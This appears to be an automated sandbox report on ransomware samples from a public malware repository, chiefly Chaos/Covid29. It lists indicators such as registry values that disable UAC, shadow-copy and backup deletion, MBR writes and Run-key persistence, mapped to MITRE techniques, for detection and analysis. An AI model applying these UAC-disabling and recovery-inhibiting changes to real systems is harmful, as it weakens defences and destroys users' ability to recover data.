chaos | hxxps://github[.]com/Endermanch/MalwareDatabase

max time kernel
424s
max time network
430s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
25-08-2024 01:07

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/Endermanch/MalwareDatabase

Score

10^/10

chaos bootkit defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan upx

Malware Config

Signatures

Chaos
Ransomware family first seen in June 2021.
ransomware chaos

Chaos Ransomware 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\6EEE.tmp\Cov29Cry.exe.death	family_chaos
behavioral1/memory/336-1068-0x0000000000300000-0x0000000000320000-memory.dmp	family_chaos
behavioral1/memory/3588-1089-0x0000000000400000-0x00000000005D5000-memory.dmp	family_chaos
behavioral1/memory/3588-1136-0x0000000000400000-0x00000000005D5000-memory.dmp	family_chaos

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4792 bcdedit.exe
4648 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1604 wbadmin.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

pid	process
4792	bcdedit.exe
4648	bcdedit.exe

pid	process
1604	wbadmin.exe

Drops startup file 3 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt	svchost.exe

Executes dropped EXE 5 IoCs

Processes:

mbr.exeCov29Cry.exesvchost.exeCov29LockScreen.exeHorrorBob2.exe

pid process

1368 mbr.exe
336 Cov29Cry.exe
3444 svchost.exe
1368 Cov29LockScreen.exe
1956 HorrorBob2.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1368	mbr.exe
336	Cov29Cry.exe
3444	svchost.exe
1368	Cov29LockScreen.exe
1956	HorrorBob2.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/3588-1017-0x0000000000400000-0x00000000005D5000-memory.dmp	upx
behavioral1/memory/3588-1089-0x0000000000400000-0x00000000005D5000-memory.dmp	upx
behavioral1/memory/3588-1136-0x0000000000400000-0x00000000005D5000-memory.dmp	upx
C:\Users\Admin\Downloads\HorrorBob2.exe	upx
behavioral1/memory/1956-1230-0x0000000000400000-0x000000000132F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\2B15.tmp\Service64.exe	upx
behavioral1/memory/1956-1259-0x0000000000400000-0x000000000132F000-memory.dmp	upx
behavioral1/memory/1956-1269-0x0000000000400000-0x000000000132F000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe"	reg.exe

Drops desktop.ini file(s) 35 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Music\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	svchost.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1453213197-474736321-1741884505-1000\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service
T1102

Processes:

flow ioc

36 raw.githubusercontent.com
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

mbr.exe

description ioc process

File opened for modification \??\PhysicalDrive0 mbr.exe

flow	ioc
36	raw.githubusercontent.com

description	ioc	process
File opened for modification	\??\PhysicalDrive0	mbr.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

svchost.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sbcf7kdxa.jpg"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp"	reg.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exereg.exetaskkill.exenet.exereg.exereg.exembr.exeshutdown.exereg.exereg.exereg.exereg.exeTrojanRansomCovid29.execscript.exereg.exerundll32.exereg.exeshutdown.exereg.exereg.exereg.exePING.EXEPING.EXEHorrorBob2.exenet1.exeDllHost.exeWScript.exereg.exeCov29LockScreen.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mbr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TrojanRansomCovid29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HorrorBob2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cov29LockScreen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXEPING.EXE

pid process

3972 PING.EXE
3800 PING.EXE

pid	process
3972	PING.EXE
3800	PING.EXE

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exe

pid process

4848 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2328 taskkill.exe

pid	process
4848	vssadmin.exe

pid	process
2328	taskkill.exe

Modifies data under HKEY_USERS 17 IoCs

Processes:

LogonUI.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133690216538424842"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe

Modifies registry class 3 IoCs

Processes:

chrome.execmd.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	svchost.exe

Modifies registry key 1 TTPs 10 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

5024 reg.exe
1548 reg.exe
1636 reg.exe
5028 reg.exe
4132 reg.exe
4692 reg.exe
4164 reg.exe
3268 reg.exe
2720 reg.exe
820 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

3972 PING.EXE
3800 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

svchost.exe

pid process

3444 svchost.exe

pid	process
5024	reg.exe
1548	reg.exe
1636	reg.exe
5028	reg.exe
4132	reg.exe
4692	reg.exe
4164	reg.exe
3268	reg.exe
2720	reg.exe
820	reg.exe

pid	process
3972	PING.EXE
3800	PING.EXE

pid	process
3444	svchost.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

Processes:

chrome.exechrome.exeCov29Cry.exesvchost.exe

pid	process
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
4716	chrome.exe
4716	chrome.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
336	Cov29Cry.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe
3444	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

rundll32.exe

pid process

3556 rundll32.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

chrome.exe

pid process

1596 chrome.exe
1596 chrome.exe
1596 chrome.exe
1596 chrome.exe
1596 chrome.exe
1596 chrome.exe
1596 chrome.exe
1596 chrome.exe
1596 chrome.exe

pid	process
3556	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe
Token: SeShutdownPrivilege	1596	chrome.exe
Token: SeCreatePagefilePrivilege	1596	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe

Suspicious use of SendNotifyMessage 28 IoCs

Processes:

chrome.exe

pid	process
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe
1596	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Cov29LockScreen.exeLogonUI.exe

pid process

1368 Cov29LockScreen.exe
280 LogonUI.exe

pid	process
1368	Cov29LockScreen.exe
280	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1596 wrote to memory of 1576	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 1576	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2164	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 4468	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 4468	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
PID 1596 wrote to memory of 2416	1596	chrome.exe	chrome.exe
